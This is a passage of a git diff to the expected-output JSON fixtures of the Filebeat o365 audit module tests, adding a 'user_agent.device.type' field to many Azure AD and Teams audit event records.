"asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:73.0) Gecko/20100101 Firefox/73.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json index 749af2475a3..4cef7b83abb 100644 --- a/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/15-azuread-sts-logon.log-expected.json @@ -91,6 +91,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -190,6 +191,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -289,6 +291,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -388,6 +391,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -487,6 +491,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -586,6 +591,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -685,6 +691,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -784,6 +791,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -883,6 +891,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -982,6 +991,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1081,6 +1091,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1180,6 +1191,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1279,6 +1291,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1378,6 +1391,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1474,6 +1488,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1573,6 +1588,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1672,6 +1688,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1768,6 +1785,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1867,6 +1885,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -1966,6 +1985,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2065,6 +2085,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2164,6 +2185,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2263,6 +2285,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2362,6 +2385,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2461,6 +2485,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2560,6 +2585,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2659,6 +2685,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2758,6 +2785,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2857,6 +2885,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -2955,6 +2984,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3055,6 +3085,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3140,6 +3171,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3239,6 +3271,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3324,6 +3357,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3424,6 +3458,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3509,6 +3544,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3609,6 +3645,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3708,6 +3745,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3807,6 +3845,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3892,6 +3931,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -3992,6 +4032,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4088,6 +4129,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4187,6 +4229,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4286,6 +4329,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4371,6 +4415,7 @@ ], "user.id": "Unknown", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4470,6 +4515,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4569,6 +4615,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4668,6 +4715,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4767,6 +4815,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4866,6 +4915,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -4965,6 +5015,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5064,6 +5115,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5163,6 +5215,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5262,6 +5315,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5361,6 +5415,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5460,6 +5515,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5559,6 +5615,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5658,6 +5715,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5754,6 +5812,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5853,6 +5912,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -5952,6 +6012,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6051,6 +6112,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6150,6 +6212,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6249,6 +6312,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6348,6 +6412,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6447,6 +6512,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6546,6 +6612,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6645,6 +6712,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", @@ -6744,6 +6812,7 @@ "user.id": "asr@testsiem.onmicrosoft.com", "user.name": "asr", "user_agent.device.name": "Mac", + "user_agent.device.type": "Desktop", "user_agent.name": "Firefox", "user_agent.original": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0", "user_agent.os.full": "Mac OS X 10.14", diff --git a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json index 372b29d8c2c..4a7b5761b35 100644 --- a/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json +++ b/x-pack/filebeat/module/o365/audit/test/25-ms-teams-groups.log-expected.json @@ -179,6 +179,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -255,6 +256,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -307,6 +309,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -359,6 +362,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -411,6 +415,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -463,6 +468,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -515,6 +521,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -581,6 +588,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -633,6 +641,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -685,6 +694,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "" }, @@ -762,6 +772,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -832,6 +843,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "SkypeSpaces/1.0a$*+" }, @@ -909,6 +921,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -986,6 +999,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1063,6 +1077,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1140,6 +1155,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1217,6 +1233,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1294,6 +1311,7 @@ "user.id": "app@sharepoint", "user.name": "app", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", "user_agent.original": "onenoteapi" }, @@ -1477,6 +1495,7 @@ "user.id": "root@testsiem4.onmicrosoft.com", "user.name": "root", "user_agent.device.name": "Other", + "user_agent.device.type": "Other", "user_agent.name": "Other", 